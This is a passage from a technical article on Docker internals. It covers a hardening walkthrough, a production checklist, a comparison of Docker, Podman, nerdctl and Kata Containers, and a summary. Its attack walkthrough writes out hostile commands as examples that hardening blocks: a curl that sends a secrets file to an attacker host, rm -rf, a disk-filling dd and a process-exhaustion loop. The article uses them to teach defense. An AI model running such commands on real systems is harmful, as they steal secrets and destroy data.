→ BLOCKED by capabilities (no CAP_SYS_ADMIN)
Step 3: Attacker tries: docker run --privileged (via mounted socket)
→ BLOCKED - no Docker socket mounted
Step 4: Attacker tries: apt-get install nmap
→ BLOCKED - running distroless image (no package manager)
Step 5: Attacker tries: reboot
→ BLOCKED by seccomp (reboot syscall not allowed)
Step 6: Attacker tries: while true; do :; done & (fork bomb)
→ BLOCKED by cgroups (pids.max = 100)
Step 7: Attacker tries: dd if=/dev/zero of=/file bs=1G count=100
→ BLOCKED by cgroups (disk I/O limits)
Step 8: Attacker tries: curl http://attacker.com/exfil < /app/secrets.txt
→ WORKS - but secrets aren't in the container (mounted as read-only volume)
Step 9: Attacker tries: rm -rf /app
→ BLOCKED - filesystem mounted read-only (--read-only flag)
Even with RCE, the attacker can't escape, can't persist, can't exfiltrate sensitive data, and can't cause resource exhaustion.
11.8 Hardening Checklist
Here's a practical checklist for production containers. (The inline comments are for readability; strip them before running, since a comment line terminates a backslash continuation.)
docker run \
# Drop all capabilities, add back only what's needed
--cap-drop=ALL \
--cap-add=NET_BIND_SERVICE \
# Run as non-root
--user 1001:1001 \
# Read-only root filesystem
--read-only \
--tmpfs /tmp:rw,noexec,nosuid,size=100m \
# Limit resources
--memory=512m \
--cpus=1.0 \
--pids-limit=100 \
# Enable security profiles
--security-opt=no-new-privileges \
--security-opt=seccomp=/path/to/custom-seccomp.json \
--security-opt=apparmor=docker-default \
# Network isolation
--network=isolated-net \
# Never do this:
# --privileged # NO!
# -v /var/run/docker.sock:/var/... # NO!
# -v /:/host # NO!
# --cap-add=SYS_ADMIN # NO!
my-app:latest
11.9 The Bottom Line
Docker's security model is kernel-based isolation, not hypervisor-based isolation. This means:
✅ Fast: No VM overhead
✅ Efficient: Shared kernel, minimal duplication
❌ Shared attack surface: One kernel vulnerability can break all containers
For untrusted workloads (running customer code, multi-tenant SaaS), consider:
- Kata Containers (VM-based isolation - see Section 12)
- gVisor (userspace kernel emulation)
- Firecracker (microVMs)
For trusted workloads (your own apps), Docker's default security + hardening is sufficient — just follow the checklist above.
The key insight: Security isn't binary. It's about reducing the blast radius when (not if) something goes wrong.
12. Docker vs. Podman vs. nerdctl vs. Kata Containers
Now that we've internalized how Docker works layer by layer, the natural question is: what are the alternatives, and where do they diverge at the architectural level? This section isn't a feature checklist — it's a structural comparison. Every difference traced below maps directly to the internals we covered above.
12.1 Architectural Comparison at a Glance
The single biggest differentiator across all these tools is where in the stack they place the daemon — or deliberately remove it.
12.2 Docker — The Daemon-Centric Model
Docker's architecture is exactly what we dissected in Sections 2–5. The defining characteristic is the persistent root daemon (dockerd). Every container operation routes through it. This gives Docker a centralized control plane — easy to manage, easy to expose remotely via API — but it also means:
- A single daemon crash can bring down all containers on that host.
- The daemon socket (/var/run/docker.sock) is a high-value attack target. Anyone who can write to it has full host control.
- Docker does offer a rootless mode (introduced in 2021), but it works by launching a user-space daemon that mimics the traditional architecture rather than removing the daemon entirely. It improves security but retains the fundamental client-server shape.
Docker's strength remains its ecosystem — over 20 million developers, deep integration with CI/CD platforms (GitHub Actions, Jenkins, GitLab), and Docker Hub as the dominant public registry.
12.3 Podman — The Daemonless, Rootless Alternative
Podman (created by Red Hat) flips the architectural model. There is no persistent background daemon. When you run podman run nginx, the CLI directly forks a child process that invokes runc (or crun). Each container is a direct child of your shell or of systemd — the process tree looks like normal user processes.
The security implications are substantial. Podman does not use a central daemon — each container starts as a child process of the user session that launched it. There is no persistent background service and no privileged socket running in the system. This removes the daemon as an attack surface entirely.
Rootless operation is where Podman's architecture truly shines. Podman allows regular unprivileged users to run containers without requiring any root privileges on the host, leveraging user namespaces: inside the container, processes can run as root (UID 0) but that root is mapped to an unprivileged user ID on the host.
Podman's networking in rootless mode uses slirp4netns or the newer pasta backend (introduced in Podman 5.0+) for user-mode networking, rather than Docker's privileged bridge + iptables approach. This is a meaningful trade-off: Docker's mature, privileged networking can achieve higher throughput (8–10 Gbps), while rootless Podman networking, though much improved with the pasta backend, typically peaks around 2–4 Gbps.
Podman also has a native concept of pods — groups of containers that share a network namespace — which maps directly to the Kubernetes Pod model. You can use podman generate kube to create Kubernetes manifests directly from running containers, and podman play kube to deploy them.
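The round trip looks like this (a sketch; the names are arbitrary):

podman run -d --name web -p 8080:80 nginx
podman generate kube web > web.yaml   # emit a Kubernetes Pod manifest from the running container
podman play kube web.yaml             # deploy that manifest back with Podman itself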
12.4 nerdctl — Direct Access to containerd
nerdctl is a Docker-compatible CLI that talks directly to containerd via gRPC — completely bypassing dockerd. The architecture is simpler than Docker's (no extra daemon layer on top of containerd) but still daemon-based, since containerd itself runs as a persistent service.
The goal of nerdctl is to facilitate experimenting with cutting-edge features of containerd that are not present in Docker, including on-demand image pulling (lazy-pulling) and image encryption/decryption.
The standout features that nerdctl exposes — which Docker does not yet support natively — include:
Lazy pulling (eStargz / Nydus / SOCI): Traditional image pulls download every layer before the container can start. Lazy pulling streams layers on demand — the container starts running while layers it hasn't touched yet are still downloading. This can dramatically reduce cold-start times for large images.
Image encryption (OCIcrypt): Layers can be encrypted at rest and in transit. The decryption key is provided at runtime, meaning even a compromised registry can't expose image contents.
P2P image distribution (IPFS): Images can be pushed and pulled over IPFS, removing reliance on centralized registries entirely.
Image signing (cosign): Native --verify=cosign on pull and --sign=cosign on push, bringing software supply chain security into the CLI workflow.
Unlike ctr (containerd's own debugging CLI), nerdctl aims to be user-friendly and Docker-compatible. To some extent, nerdctl + containerd can seamlessly replace docker + dockerd. It also supports nerdctl compose, making multi-container workflow migration straightforward.
12.5 Kata Containers — VM-Based Isolation
All three tools above (Docker, Podman, nerdctl) share the same fundamental isolation boundary: Linux namespaces and cgroups on a shared kernel. If a kernel vulnerability is exploited, isolation can be broken. Kata Containers solves this by replacing the namespace boundary with a hardware virtualization boundary.
At its core, Kata Containers sits underneath your existing container runtime and launches every container (or pod) inside a lightweight VM. Each container gets its own guest kernel running inside a microVM spawned by a hypervisor (QEMU, Cloud-Hypervisor, or AWS Firecracker).
The Kata Container runtime launches each container within its own hardware-isolated VM, and each VM has its own kernel. Due to this higher degree of isolation, certain container capabilities cannot be supported or are implicitly enabled through the VM.
The trade-off is cold-start latency and memory overhead. Although improving, booting VMs takes longer than containers, and VMs have more overhead than namespace-based containers. Firecracker (AWS's microVM hypervisor) has brought boot times down to around 125ms, making this viable for serverless and multi-tenant workloads — but it's still measurably slower than a pure namespace-based container.
12.6 Head-to-Head: The Architectural Trade-offs
| Tool | Daemon? | Rootless by default? | Isolation boundary | Kernel shared? | Best fit |
|---|---|---|---|---|---|
| 🐋 Docker (Engine 28.x) | ✅ dockerd (persistent, root) | ❌ Rootful by default | Namespaces + cgroups | ✅ Yes | Developer experience, ecosystem breadth, CI/CD integration |
| 🦑 Podman (5.x) | ❌ None (fork/exec model) | ✅ Yes (user namespaces) | Namespaces + cgroups | ✅ Yes | Security-first, Kubernetes alignment, enterprise / regulated |
| 📦 nerdctl (2.x) | ✅ containerd (lightweight) | ⚠️ Supported, not default | Namespaces + cgroups | ✅ Yes | Cutting-edge features, lazy pull / encryption, K8s debugging |
| 🛡️ Kata Containers | ✅ containerd + kata-shim | N/A (VM boundary) | Hardware VM (KVM / Firecracker) | ❌ Each container = own kernel | Multi-tenant clouds, regulated workloads, untrusted code |
The table above captures the facts — but the why behind those choices becomes clearer when you see where each tool lands on the isolation vs. performance spectrum:
12.7 When to Choose What
The decision is not about which tool is "best" — it's about which architectural trade-off matches your threat model and operational context.
Choose Docker when developer experience and ecosystem breadth matter most. Your team already knows it, your CI/CD pipelines already use it, and you need the widest tool compatibility. It remains the de facto standard for local development and remains deeply integrated into every major cloud platform.
Choose Podman when security posture is the primary concern. If you're in a regulated industry, running shared CI runners where multiple teams' code executes on the same host, or deploying on immutable Linux distributions (Fedora Atomic, Silverblue, Bazzite), Podman's daemonless and rootless-by-default architecture eliminates entire categories of attack surface. Its native pod model also makes it a natural fit for teams building toward Kubernetes-native workflows.
Choose nerdctl when you want to push the boundaries of what containers can do. Lazy pulling, encrypted images, P2P distribution, and cosign verification are features that don't exist in Docker today. It's also the best tool for understanding containerd's internals directly — since it bypasses dockerd entirely, you're seeing the runtime with one fewer abstraction layer.
Choose Kata Containers when the shared-kernel threat model is unacceptable. Multi-tenant clouds running untrusted customer code, serverless platforms, or workloads that need compliance-grade proof of isolation all benefit from the hard VM boundary that namespaces alone cannot provide. Kata integrates cleanly into Kubernetes via the CRI interface, so it doesn't require rewriting orchestration logic.
In practice, these tools coexist. A single Kubernetes cluster might run routine workloads with runc-backed containerd and security-sensitive jobs with Kata, while developers use Podman on their laptops. The result is not competition but coexistence: Docker for accessibility, Podman for compliance and integration. The OCI standards ensure the images are interoperable regardless of which runtime executes them.
13. Summary and Key Takeaways
Docker's power comes from its elegant composition of existing Linux primitives — it invented none of the underlying technology. The first namespace (mount) landed in Linux 2.4.19 back in 2002, most of the rest arrived by 2.6.24 (2008), and cgroups were merged in that same 2.6.24 release. Overlay filesystems predate Docker by years.
What Docker did was package these primitives into a developer-friendly workflow: a simple CLI, a declarative image format, a global registry, and a composable networking model. The internals are surprisingly simple once you see the full picture — it's the orchestration layer on top that makes it powerful.
Understanding these internals gives you the ability to:
- Debug container issues at the kernel level (/proc, cgroup filesystem, namespace inspection)
- Optimize images by understanding layer caching and CoW
- Harden security by knowing exactly where the isolation boundaries are
- Choose alternatives (containerd directly, Podman, Kata Containers) with full knowledge of the tradeoffs